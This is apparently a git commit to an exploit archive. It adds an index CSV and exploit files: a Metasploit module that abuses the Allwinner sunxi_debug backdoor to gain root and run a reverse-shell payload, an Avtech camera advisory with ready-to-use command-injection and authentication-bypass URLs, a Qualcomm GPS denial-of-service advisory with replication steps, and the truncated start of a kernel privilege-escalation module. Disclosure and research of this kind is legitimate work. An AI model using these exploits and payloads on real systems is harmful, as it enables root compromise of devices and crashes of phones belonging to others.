DB: 2016-10-12
12 new exploits Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation Spacemarc News - Cross-Site Request Forgery (Add New Post) Minecraft Launcher - Insecure File Permissions Privilege Escalation BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery sheed AntiVirus - Unquoted Service Path Privilege Escalation AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection Android - 'gpsOneXtra' Data Files Denial of Service Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit) Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit) ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
This commit is contained in:
parent
a3dbf3113e
commit
f8b17d14a1
13 changed files with 1496 additions and 1 deletions
14
files.csv
14
files.csv
|
@ -36606,7 +36606,19 @@ id,file,description,date,author,platform,type,port
|
|||
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
|
||||
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
|
||||
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
|
||||
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
|
||||
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
|
||||
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
|
||||
40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
|
||||
40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
||||
40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
|
||||
40494,platforms/windows/local/40494.txt,"Minecraft Launcher - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
|
||||
40495,platforms/php/webapps/40495.html,"BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
|
||||
40496,platforms/php/webapps/40496.html,"phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery",2016-10-11,Besim,php,webapps,80
|
||||
40497,platforms/windows/local/40497.txt,"sheed AntiVirus - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
|
||||
40500,platforms/cgi/webapps/40500.txt,"AVTECH IP Camera_ NVR_ and DVR Devices - Multiple Vulnerabilities",2016-10-11,"Gergely Eberhardt",cgi,webapps,80
|
||||
40501,platforms/xml/webapps/40501.txt,"RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection",2016-10-11,"SEC Consult",xml,webapps,0
|
||||
40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
|
||||
40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - Recvmmsg Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
|
||||
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
|
||||
40505,platforms/php/webapps/40505.txt,"ApPHP MicroBlog 1.0.2 - Stored Cross Site Scripting",2016-10-11,Besim,php,webapps,0
|
||||
40506,platforms/php/webapps/40506.html,"ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)",2016-10-11,Besim,php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
234
platforms/android/dos/40502.txt
Executable file
234
platforms/android/dos/40502.txt
Executable file
|
@ -0,0 +1,234 @@
|
|||
Original at:
|
||||
https://wwws.nightwatchcybersecurity.com/2016/10/04/advisory-cve-2016-5348-2/
|
||||
|
||||
Summary
|
||||
|
||||
Android devices can be crashed remotely forcing a halt and then a soft
|
||||
reboot by a MITM attacker manipulating assisted GPS/GNSS data provided
|
||||
by Qualcomm. This issue affects the open source code in AOSP and
|
||||
proprietary code in a Java XTRA downloader provided by Qualcomm. The
|
||||
Android issue was fixed by in the October 2016 Android bulletin.
|
||||
Additional patches have been issued by Qualcomm to the proprietary
|
||||
client in September of 2016. This issue may also affect other
|
||||
platforms that use Qualcomm GPS chipsets and consume these files but
|
||||
that has not been tested by us, and requires further research.
|
||||
|
||||
Background – GPS and gpsOneXtra
|
||||
|
||||
Most mobile devices today include ability to locate themselves on the
|
||||
Earth’s surface by using the Global Positioning System (GPS), a system
|
||||
originally developed and currently maintained by the US military.
|
||||
Similar systems developed and maintained by other countries exist as
|
||||
well including Russia’s GLONASS, Europe’s Galileo, and China’s Beidou.
|
||||
The GPS signals include an almanac which lists orbit and status
|
||||
information for each of the satellites in the GPS constellation. This
|
||||
allows the receivers to acquire the satellites quicker since the
|
||||
receiver would not need to search blindly for the location of each
|
||||
satellite. Similar functionality exists for other GNSS systems. In
|
||||
order to solve the problem of almanac acquisition, Qualcomm developed
|
||||
the gpsOneXtra system in 2007 (also known as IZat XTRA Assistance
|
||||
since 2013). This system provides ability to GPS receivers to download
|
||||
the almanac data over the Internet from Qualcomm-operated servers. The
|
||||
format of these XTRA files is proprietary but seems to contain current
|
||||
satellite location data plus estimated locations for the next 7 days,
|
||||
as well as additional information to improve signal acquisition. Most
|
||||
Qualcomm mobile chipsets and GPS chips include support for this
|
||||
technology. A related Qualcomm technology called IZat adds ability to
|
||||
use WiFi and cellular networks for locations in addition to GPS.
|
||||
|
||||
Background – Android and gpsOneXtra Data Files
|
||||
|
||||
During our network monitoring of traffic originating from an Android
|
||||
test device, we discovered that the device makes periodic calls to the
|
||||
Qualcomm servers to retrieve gpsOneXtra assistance files. These
|
||||
requests were performed almost every time the device connected to a
|
||||
WiFi network. As discovered by our research and confirmed by the
|
||||
Android source code, the following URLs were used:
|
||||
|
||||
http://xtra1.gpsonextra.net/xtra.bin
|
||||
http://xtra2.gpsonextra.net/xtra.bin
|
||||
http://xtra3.gpsonextra.net/xtra.bin
|
||||
|
||||
http://xtrapath1.izatcloud.net/xtra2.bin
|
||||
http://xtrapath2.izatcloud.net/xtra2.bin
|
||||
http://xtrapath3.izatcloud.net/xtra2.bin
|
||||
|
||||
WHOIS record show that both domains – gpsonextra.net and izatcloud.net
|
||||
are owned by Qualcomm. Further inspection of those URLs indicate that
|
||||
both domains are being hosted and served from Amazon’s Cloudfront CDN
|
||||
service (with the exception of xtra1.gpsonextra.net which is being
|
||||
served directly by Qualcomm). On the Android platform, our inspection
|
||||
of the Android source code shows that the file is requested by an
|
||||
OS-level Java process (GpsXtraDownloader.java), which passes the data
|
||||
to a C++ JNI class
|
||||
(com_android_server_location_GnssLocationProvider.cpp), which then
|
||||
injects the files into the Qualcomm modem or firmware. We have not
|
||||
inspected other platforms in detail, but suspect that a similar
|
||||
process is used. Our testing was performed on Android v6.0, patch
|
||||
level of January 2016, on a Motorola Moto G (2nd gen) GSM phone, and
|
||||
confirmed on a Nexus 6P running Android v6.01, with May 2016 security
|
||||
patches. Qualcomm has additionally performed testing on their
|
||||
proprietary Java XTRA downloader client confirming this vulnerability.
|
||||
|
||||
Vulnerability Details
|
||||
|
||||
Android platform downloads XTRA data files automatically when
|
||||
connecting to a new network. This originates from a Java class
|
||||
(GpsXtraDownloader.java), which then passes the file to a C++/JNI
|
||||
class (com_android_server_location_GnssLocationProvider.cpp) and then
|
||||
injects it into the Qualcomm modem.
|
||||
|
||||
The vulnerability is that both the Java and the C++ code do not check
|
||||
how large the data file actually is. If a file is served that is
|
||||
larger than the memory available on the device, this results in all
|
||||
memory being exhausted and the phone halting and then soft rebooting.
|
||||
The soft reboot was sufficient to recover from the crash and no data
|
||||
was lost. While we have not been able to achieve remote code execution
|
||||
in either the Qualcomm modem or in the Android OS, this code path can
|
||||
potentially be exploited for such attacks and would require more
|
||||
research.
|
||||
|
||||
To attack, an MITM attacker located anywhere on the network between
|
||||
the phone being attacked and Qualcomm’s servers can initiate this
|
||||
attack by intercepting the legitimate requests from the phone, and
|
||||
substituting their own, larger files. Because the default Chrome
|
||||
browser on Android reveals the model and build of the phone (as we
|
||||
have written about earlier), it would be possible to derive the
|
||||
maximum memory size from that information and deliver the
|
||||
appropriately sized attack file. Possible attackers can be hostile
|
||||
hotspots, hacked routers, or anywhere along the backbone. This is
|
||||
somewhat mitigated by the fact that the attack file would need to be
|
||||
as large as the memory on the phone.
|
||||
|
||||
The vulnerable code resides here – (GpsXtraDownloader.java, lines 120-127):
|
||||
|
||||
connection.connect()
|
||||
int statusCode = connection.getResponseCode();
|
||||
if (statusCode != HttpURLConnection.HTTP_OK) {
|
||||
if (DEBUG) Log.d(TAG, “HTTP error downloading gps XTRA: “ + statusCode);
|
||||
return null;
|
||||
}
|
||||
return Streams.readFully(connection.getInputStream());
|
||||
|
||||
Specifically, the affected code is using Streams.readFully to read the
|
||||
entire file into memory without any kind of checks on how big the file
|
||||
actually is.
|
||||
|
||||
Additional vulnerable code is also in the C++ layer –
|
||||
(com_android_server_location_GnssLocationProvider.cpp, lines 856-858):
|
||||
|
||||
jbyte* bytes = (jbyte *)env->GetPrimitiveArrayCritical(data, 0);
|
||||
sGpsXtraInterface->inject_xtra_data((char *)bytes, length);
|
||||
env->ReleasePrimitiveArrayCritical(data, bytes, JNI_ABORT);
|
||||
|
||||
Once again, no size checking is done. We were able to consistently
|
||||
crash several different Android phones via a local WiFi network with
|
||||
the following error message:
|
||||
|
||||
java.lang.OutOfMemoryError: Failed to allocate a 478173740 byte
|
||||
allocation with 16777216 free bytes and 252MB until OOM
|
||||
at java.io.ByteArrayOutputStream.expand(ByteArrayOutputStream.java:91)
|
||||
|
||||
(It should be noted that we were not able to consistently and reliable
|
||||
achieve a crash in the C++/JNI layer or the Qualcomm modem itself)
|
||||
|
||||
Steps To Replicate (on Ubuntu 16.04)
|
||||
1. Install DNSMASQ:
|
||||
sudo apt-get install dnsmasq
|
||||
|
||||
2. Install NGINX:
|
||||
sudo apt-get install nginx
|
||||
|
||||
3. Modify the /etc/hosts file to add the following entries to map to
|
||||
the IP of the local computer (varies by vendor of the phone):
|
||||
192.168.1.x xtra1.gpsonextra.net
|
||||
192.168.1.x xtra2.gpsonextra.net
|
||||
192.168.1.x xtra3.gpsonextra.net
|
||||
192.168.1.x xtrapath1.izatcloud.net
|
||||
192.168.1.x xtrapath2.izatcloud.net
|
||||
192.168.1.x xtrapath3.izatcloud.net
|
||||
|
||||
4. Configure /etc/dnsmasq.conf file to listed on the IP:
|
||||
listen-address=192.168.1.x
|
||||
|
||||
5. Restart DNSMASQ:
|
||||
sudo /etc/init.d/dnsmasq restart
|
||||
|
||||
6. Use fallocate to create the bin files in “/var/www/html/”
|
||||
sudo fallocate -s 2.5G xtra.bin
|
||||
sudo fallocate -s 2.5G xtra2.bin
|
||||
sudo fallocate -s 2.5G xtra3.bin
|
||||
|
||||
7. Modify the settings on the Android test phone to static, set DNS to
|
||||
point to “192.168.1.x”. AT THIS POINT – Android will resolve DNS
|
||||
against the local computer, and serve the GPS files from it.
|
||||
|
||||
To trigger the GPS download, disable WiFi and enable Wifi, or
|
||||
enable/disable Airplane mode. Once the phone starts downloading the
|
||||
files, the screen will go black and it will reboot.
|
||||
|
||||
PLEASE NOTE: on some models, the XTRA file is cached and not retrieved
|
||||
on every network connect. For those models, you may need to reboot the
|
||||
phone and/or follow the injection commands as described here. You can
|
||||
also use an app like GPS Status and ToolboxGPS Status and Toolbox.
|
||||
|
||||
The fix would be to check for file sizes in both Java and native C++ code.
|
||||
|
||||
Mitigation Steps
|
||||
|
||||
For the Android platform, users should apply the October 2016 Android
|
||||
security bulletin and any patches provided by Qualcomm. Please note
|
||||
that as per Qualcomm, the patches for this bug only include fixes to
|
||||
the Android Open Source Project (AOSP) and the Qualcomm Java XTRA
|
||||
downloader clients. Apple and Microsoft have indicated to us via email
|
||||
that GPS-capable devices manufactured by them including iPad, iPhones,
|
||||
etc. and Microsoft Surface and Windows Phone devices are not affected
|
||||
by this bug. Blackberry devices powered by Android are affected but
|
||||
the Blackberry 10 platform is not affected by this bug. For other
|
||||
platforms, vendors should follow guidance provided by Qualcomm
|
||||
directly via an OEM bulletin.
|
||||
|
||||
Bounty Information
|
||||
|
||||
This bug has fulfilled the requirements for Google’s Android Security
|
||||
Rewards and a bounty has been paid.
|
||||
|
||||
References
|
||||
|
||||
Android security bulletin: October 2016
|
||||
CERT/CC tracking: VR-179
|
||||
CVE-ID: CVE-2016-5348
|
||||
Google: Android bug # 213747 / AndroidID-29555864
|
||||
|
||||
CVE Information
|
||||
|
||||
As provided by Qualcomm:
|
||||
|
||||
CVE: CVE-2016-5348
|
||||
Access Vector: Network
|
||||
Security Risk: High
|
||||
Vulnerability: CWE-400: Uncontrolled Resource Consumption (‘Resource
|
||||
Exhaustion’)
|
||||
Description: When downloading a very large assistance data file, the
|
||||
client may crash due to out of memory error.
|
||||
Change summary:
|
||||
|
||||
check download size ContentLength before downloading data
|
||||
catch OOM exception
|
||||
|
||||
Credits
|
||||
|
||||
We would like to thank CERT/CC for helping to coordinate this process,
|
||||
and all of the vendors involved for helpful comments and a quick
|
||||
turnaround. This bug was discovered by Yakov Shafranovich, and the
|
||||
advisory was also written by Yakov Shafranovich.
|
||||
|
||||
Timeline
|
||||
|
||||
201606-20: Android bug report filed with Google
|
||||
2016-06-21: Android bug confirmed
|
||||
2016-06-21: Bug also reported to Qualcomm and CERT.
|
||||
2016-09-14: Coordination with Qualcomm on public disclosure
|
||||
2016-09-15: Coordination with Google on public disclosure
|
||||
2016-10-03: Android security bulletin released with fix
|
||||
2016-10-04: Public disclosure
|
83
platforms/android/local/40504.rb
Executable file
83
platforms/android/local/40504.rb
Executable file
|
@ -0,0 +1,83 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Linux::Priv
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
"Name" => "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
|
||||
"Description" => %q{
|
||||
This module attempts to exploit a debug backdoor privilege escalation in
|
||||
Allwinner SoC based devices.
|
||||
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
||||
Vulnerable OS: all OS images available for Orange Pis,
|
||||
any for FriendlyARM's NanoPi M1,
|
||||
SinoVoip's M2+ and M3,
|
||||
Cuebietech's Cubietruck +
|
||||
Linksprite's pcDuino8 Uno
|
||||
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
||||
},
|
||||
"License" => MSF_LICENSE,
|
||||
"Author" =>
|
||||
[
|
||||
"h00die <mike@stcyrsecurity.com>", # Module
|
||||
"KotCzarny" # Discovery
|
||||
],
|
||||
"Platform" => [ "android", "linux" ],
|
||||
"DisclosureDate" => "Apr 30 2016",
|
||||
"DefaultOptions" => {
|
||||
"payload" => "linux/armle/mettle/reverse_tcp"
|
||||
},
|
||||
"Privileged" => true,
|
||||
"Arch" => ARCH_ARMLE,
|
||||
"References" =>
|
||||
[
|
||||
[ "URL", "http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/"],
|
||||
[ "URL", "https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:" \
|
||||
"https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us"],
|
||||
[ "URL", "http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"]
|
||||
],
|
||||
"SessionTypes" => [ "shell", "meterpreter" ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Auto', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
backdoor = '/proc/sunxi_debug/sunxi_debug'
|
||||
if file_exist?(backdoor)
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
backdoor = '/proc/sunxi_debug/sunxi_debug'
|
||||
if file_exist?(backdoor)
|
||||
pl = generate_payload_exe
|
||||
|
||||
exe_file = "/tmp/#{rand_text_alpha(5)}.elf"
|
||||
vprint_good "Backdoor Found, writing payload to #{exe_file}"
|
||||
write_file(exe_file, pl)
|
||||
cmd_exec("chmod +x #{exe_file}")
|
||||
|
||||
vprint_good 'Escalating'
|
||||
cmd_exec("echo rootmydevice > #{backdoor}; #{exe_file}")
|
||||
else
|
||||
print_error "Backdoor #{backdoor} not found."
|
||||
end
|
||||
end
|
||||
end
|
218
platforms/cgi/webapps/40500.txt
Executable file
218
platforms/cgi/webapps/40500.txt
Executable file
|
@ -0,0 +1,218 @@
|
|||
Avtech devices multiple vulnerabilities
|
||||
--------------------------------------------------
|
||||
|
||||
Platforms / Firmware confirmed affected:
|
||||
- Every Avtech device (IP camera, NVR, DVR) and firmware version. [4]
|
||||
contains the list of confirmed firmware versions, which are affected.
|
||||
- Product page: http://www.avtech.com.tw/
|
||||
|
||||
ôAVTECH, founded in 1996, is one of the worldÆs leading CCTV
|
||||
manufacturers. With stably increasing revenue and practical business
|
||||
running philosophy, AVTECH has been ranked as the largest public-listed
|
||||
company among the Taiwan surveillance industry. AVTECH makes every
|
||||
effort on the innovation of technology, product and implementation.
|
||||
Based on years of research and industry experience, AVTECH has obtained
|
||||
a leading position on mobile platform support and provides a full range
|
||||
of surveillance products.ö
|
||||
|
||||
Avtech is the second most popular search term in Shodan. According to
|
||||
Shodan, more than 130.000 Avtech devices are exposed to the internet.
|
||||
|
||||
Vulnerabilities
|
||||
---------------
|
||||
1) Plaintext storage of administrative password
|
||||
Every user password is stored in clear text. An attacker with access to
|
||||
the device itself can easily obtain the full list of passwords. By
|
||||
exploiting command injection or authentication bypass issues, the clear
|
||||
text admin password can be retrieved.
|
||||
|
||||
2) Missing CSRF protection
|
||||
The web interface does not use any CSRF protection. If a valid session
|
||||
exists for the user, the attacker can modify all settings of the device
|
||||
via CSRF. If there is no valid session, but the user did not change the
|
||||
default admin password, the attacker can log in as admin via CSRF as well.
|
||||
|
||||
3) Unauthenticated information disclosure
|
||||
Under the /cgi-bin/nobody folder every CGI script can be accessed
|
||||
without authentication.
|
||||
POC: GET /cgi-bin/nobody/Machine.cgi?action=get_capability
|
||||
Example response:
|
||||
Firmware.Version=1011-1005-1008-1002
|
||||
MACAddress=00:0E:53:xx:xx:xx
|
||||
Product.Type=DVR
|
||||
Product.ID=308B
|
||||
Product.ShortName=V_full_Indep,V_Multistream
|
||||
Video.System=PAL
|
||||
Audio.DownloadFormat=ULAW
|
||||
Video.Input.Num=8
|
||||
Video.Output.Num=1
|
||||
Video.Format=H264,MJPEG
|
||||
Video.Format.Default=H264
|
||||
Video.Resolution=4CIF,CIF
|
||||
Video.Quality=BEST,HIGH,NORMAL,BASIC
|
||||
Video.Local.Input.Num=8
|
||||
Video.Local.Output.Num=1
|
||||
Video.Local.Format=H264,MJPEG
|
||||
Audio.Input.Num=8
|
||||
Audio.Output.Num=1
|
||||
Audio.Format=ULAW
|
||||
Audio.Local.Input.Num=8
|
||||
Audio.Local.Output.Num=1
|
||||
Audio.Local.Format=PCM
|
||||
Language.Default=ENGLISH
|
||||
Language.Support=ENGLISH&CHINESE&JAPANESE&FRANCE&GERMAN&SPANISH&PORTUGUESE&ITALIAN&TURKISH&POLISH&RUSSIAN&CUSTOMIZE&THAI
|
||||
&VIETNAM&DUTCH&GREEK&ARABIC&CZECH&HUNGARIAN&HEBREW&CHINA&
|
||||
Capability=D0,80,A,80
|
||||
PushNotify.MaxChannel=8
|
||||
|
||||
4) Unauthenticated SSRF in DVR devices
|
||||
In case of DVR devices, Search.cgi can be accessed without
|
||||
authentication. This service is responsible for searching and accessing
|
||||
IP cameras in the local network. In newer firmware versions, Search.cgi
|
||||
provides the cgi_query action, which performs an HTTP request with the
|
||||
specified parameters. By modifying the ip, port and queryb64str
|
||||
parameters, an attacker is able to perform arbitrary HTTP requests
|
||||
through the DVR device without authentication.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==
|
||||
|
||||
5) Unauthenticated command injection in DVR devices
|
||||
The cgi_query action in Search.cgi performs HTML requests with the wget
|
||||
system command, which uses the received parameters without sanitization
|
||||
or verification. By exploiting this issue, an attacker can execute any
|
||||
system command with root privileges without authentication.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=LW==&username=admin%20;XmlAp%20r%20Account.User1.Password>$(ps|grep%20Search.cgi|grep%20-v%20grep|head%20-n%201|awk%20'{print%20"/tmp/"$1".log"}');&password=admin
|
||||
|
||||
6) Authentication bypass #1
|
||||
Video player plugins are stored as .cab files in the web root, which can
|
||||
be accessed and downloaded without authentication. The cab file request
|
||||
verification in the streamd web server is performed with the strstr
|
||||
function, which means that a request should not be authenticated if it
|
||||
contains the ô.cabö string anywhere in the URL. We note that some of the
|
||||
models contain an additional check in the CgiDaemon, which allows
|
||||
unauthenticated cgi access only under the /cgi-bin/nobody folder.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*
|
||||
|
||||
7) Authentication bypass #2
|
||||
Cgi scripts in the /cgi-bin/nobody folder can be accessed without
|
||||
authentication (e.g. for login). The streamd web server verifies whether
|
||||
the request can be performed without authentication by searching for the
|
||||
ô/nobodyö string in the URL with the strstr function. Thus, if a
|
||||
request contains the "/nobody" string anywhere in the URL, it does not
|
||||
have to be authenticated. We note that some of the models contain an
|
||||
additional check in the CgiDaemon, which allows unauthenticated cgi
|
||||
access only under the /cgi-bin/nobody folder.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*
|
||||
|
||||
8) Unauthenticated file download from web root
|
||||
If a cab file is requested, the web server sends the file without
|
||||
processing it. Because the streamd web server verifies the cab file
|
||||
request by searching for the ô.cabö string in the URL with the strstr
|
||||
function, any file (even the cgi scripts) in the web root can be
|
||||
downloaded without authentication.
|
||||
POC: http://<device_ip>/cgi-bin/cgibox?.cab
|
||||
|
||||
9) Login captcha bypass #1
|
||||
To prevent brute-forcing attempts, Avtech devices require a captcha for
|
||||
login requests. However, if the login requests contain the login=quick
|
||||
parameter, the captcha verification is bypassed.
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/nobody/VerifyCode.cgi?account=<b64(username:password)>&login=quick
|
||||
|
||||
10) Login captcha bypass #2
|
||||
Instead of using a random session ID, Avtech devices use the
|
||||
base64-encoded username and password as the Cookie value. Since the IP
|
||||
address of the logged in user is not stored, if an attacker sets the
|
||||
Cookie manually, the captcha verification can by bypassed easily.
|
||||
|
||||
11) Authenticated command injection in CloudSetup.cgi
|
||||
Devices that support the Avtech cloud contain CloudSetup.cgi, which can
|
||||
be accessed after authentication. The exefile parameter of a
|
||||
CloudSetup.cgi request specifies the system command to be executed.
|
||||
Since there is no verification or white list-based checking of the
|
||||
exefile parameter, an attacker can execute arbitrary system commands
|
||||
with root privileges.
|
||||
POC: http://<device_ip>/cgi-bin/supervisor/CloudSetup.cgi?exefile=ps
|
||||
|
||||
12) Authenticated command injection in adcommand.cgi
|
||||
Some of the Avtech devices contain adcommand.cgi to perform ActionD
|
||||
commands. The adcommand.cgi can be accessed after authentication. In
|
||||
newer devices the ActionD daemon provides the DoShellCmd function, which
|
||||
performs a system call with the specified parameters. Since there is no
|
||||
verification or white list-based checking of the parameter of the
|
||||
DoShellCmd function, an attacker can execute arbitrary system commands
|
||||
with root privileges.
|
||||
POC:
|
||||
POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.1
|
||||
Host: <device_ip>
|
||||
Content-Length: 23
|
||||
Cookie: SSID=YWRtaW46YWRtaW4=
|
||||
|
||||
DoShellCmd "strCmd=ps&"
|
||||
|
||||
13) Authenticated command injection in PwdGrp.cgi
|
||||
The PwdGrp.cgi uses the username, password and group parameters in a new
|
||||
user creation or modification request in a system command without
|
||||
validation or sanitization. Thus and attacker can execute arbitrary
|
||||
system commands with root privileges.
|
||||
We are aware that this vulnerability is being exploited in the wild!
|
||||
POC:
|
||||
http://<device_ip>/cgi-bin/supervisor/PwdGrp.cgi?action=add&user=test&pwd=;reboot;&grp=SUPERVISOR&lifetime=5%20MIN
|
||||
|
||||
14) HTTPS used without certificate verification
|
||||
The SyncCloudAccount.sh, QueryFromClient.sh and SyncPermit.sh scripts
|
||||
use wget to access HTTPS sites, such as https://payment.eagleeyes.tw, by
|
||||
specifying the no-check-certificate parameter. Thus wget skips server
|
||||
certificate verification and a MITM attack is possible against the HTTPS
|
||||
communication.
|
||||
|
||||
Timeline
|
||||
2015.10.19: First attempt to contact with Avtech, but we did not receive
|
||||
any response
|
||||
2016.05.24: Second attempt to contact Avtech without any response
|
||||
2016.05.27: Third attempt to contact Avtech by sending e-mail to public
|
||||
Avtech e-mail addresses. We did not receive any response.
|
||||
2016.xx.xx: Full disclosure
|
||||
|
||||
POC
|
||||
---
|
||||
POC script is available to demonstrate the following problems [3]:
|
||||
- Unauthenticated information leakage (capabilities)
|
||||
- Authentication bypass (.cab, nobody)
|
||||
- Unauthenticated SSRF on DVR devices
|
||||
- Unauthenticated command injection on DVR devices
|
||||
- Login captcha bypass with login=quick or manual cookie creation
|
||||
- CloudSetup.cgi command injection after authentication
|
||||
- adcommand.cgi command injection after authentication
|
||||
|
||||
A video demonstration is also available [1], which presents some of the
|
||||
above problems.
|
||||
|
||||
Recommendations
|
||||
---------------
|
||||
Unfortunately there is no solution available for these vulnerabilities
|
||||
at the moment. You can take the following steps to protect your device:
|
||||
- Change the default admin password
|
||||
- Never expose the web interface of any Avtech device to the internet
|
||||
|
||||
We note that the above vulnerabilities were found within a short period
|
||||
of time without a systematic approach. Based on the vulnerability types
|
||||
we found and the overall code quality, the devices should contain much
|
||||
more problems.
|
||||
|
||||
Credits
|
||||
-------
|
||||
This vulnerability was discovered and researched by Gergely Eberhardt
|
||||
(@ebux25) from SEARCH-LAB Ltd. (www.search-lab.hu)
|
||||
|
||||
References
|
||||
----------
|
||||
[1]
|
||||
https://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities
|
||||
<http://www.search-lab.hu/advisories/126-avtech-devices-multiple-vulnerabilities>
|
||||
[2] https://youtu.be/BUx8nLlIMxI
|
||||
[3] https://github.com/ebux/AVTECH
|
||||
[4] http://www.search-lab.hu/media/vulnerability_matrix.txt
|
354
platforms/linux/local/40503.rb
Executable file
354
platforms/linux/local/40503.rb
Executable file
|
@ -0,0 +1,354 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require "msf/core"
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Kernel 3.13.1 Recvmmsg Privilege Escalation',
|
||||
'Description' => %q{
|
||||
This module attempts to exploit CVE-2014-0038, by sending a recvmmsg
|
||||
system call with a crafted timeout pointer parameter to gain root.
|
||||
This exploit has offsets for 3 Ubuntu 13 kernels built in:
|
||||
3.8.0-19-generic (13.04 default)
|
||||
3.11.0-12-generic (13.10 default)
|
||||
3.11.0-15-generic (13.10)
|
||||
This exploit may take up to 13 minutes to run due to a decrementing (1/sec)
|
||||
pointer which starts at 0xff*3 (765 seconds)
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@shorebreaksecurity.com>', # Module
|
||||
'rebel' # Discovery
|
||||
],
|
||||
'DisclosureDate' => 'Feb 2 2014',
|
||||
'Platform' => [ 'linux'],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Auto', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DefaultOptions' => { 'WfsDelay' => 780, 'PrependFork' => true, },
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '31347'],
|
||||
[ 'EDB', '31346'],
|
||||
[ 'CVE', '2014-0038'],
|
||||
